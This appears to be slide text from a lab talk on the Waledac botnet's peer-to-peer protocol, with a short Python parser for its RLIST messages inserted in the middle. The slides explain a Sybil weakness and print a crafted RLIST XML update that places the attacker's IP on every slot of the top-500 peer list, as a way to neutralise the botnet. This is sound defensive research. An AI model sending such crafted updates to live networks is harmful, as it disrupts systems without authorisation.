local timestamp
Sorted by local time
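For analysis purposes, an RLIST message of this shape can be read with the standard `xml.etree.ElementTree` module. The sketch below is an assumption-laden illustration: the `Peer` tuple, the function `parse_rlist` and the sample message `SAMPLE_RLIST` are invented for the example, and the elided entries (`...`) of the slide are simply left out.

```python
import xml.etree.ElementTree as ET
from typing import List, NamedTuple, Tuple


class Peer(NamedTuple):
    peer_id: str  # identifier carried in the node text
    ip: str
    port: int
    time: int     # local timestamp attached to the entry


def parse_rlist(xml_text: str) -> Tuple[int, List[Peer]]:
    """Return the global timestamp and the peer entries, in document order."""
    root = ET.fromstring(xml_text)
    global_time = int(root.findtext("localtime"))
    peers = [
        Peer(node.text.strip(), node.get("ip"), int(node.get("port")), int(node.get("time")))
        for node in root.iter("node")
    ]
    return global_time, peers


# Sample message with the placeholder addresses used on the slide.
SAMPLE_RLIST = (
    "<lm><localtime>1244053204</localtime><nodes>"
    '<node ip="a.b.c.d" port="80" time="124053217">469abea004710c1ac0022489cef03183</node>'
    '<node ip="e.f.g.h" port="80" time="124053232">691775154c03424d9f12c17fdf4b640b</node>'
    "</nodes></lm>"
)
```

Parsing `SAMPLE_RLIST` yields the global timestamp and two `Peer` entries, each identified by its id rather than by its IP address.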
Waledac Peer-to-peer communication protocol
• Updates are based on the most recent timestamps
• An IP address does not identify a peer
• The id identifies a peer
• Vulnerable to a Sybil attack
• Craft an RLIST update to put «myIP» on the top-500 list
<lm>
  <localtime>0</localtime>
  <nodes>
    <node ip="myIP" port="80" time="0">00000000000000000000000000000001</node>
    ...
    <node ip="myIP" port="80" time="0">00000000000000000000000000000500</node>
  </nodes>
</lm>
Botnet neutralization in the lab
Figure: attack scenario in the lab, with an attacker, spammers, repeaters, protectors and a WHITE C&C
High Security Lab @ Nancy
lhs.loria.fr
Telescope & honeypots
In vitro experiment clusters
Conclusion
• Mathematical definitions of malware with tools
• High level representation of binaries
• Abstract signatures which are robust w.r.t. obfuscation
• Experiments theories
• Analysis tools combining static and dynamic analysis
• Detection and neutralization heuristics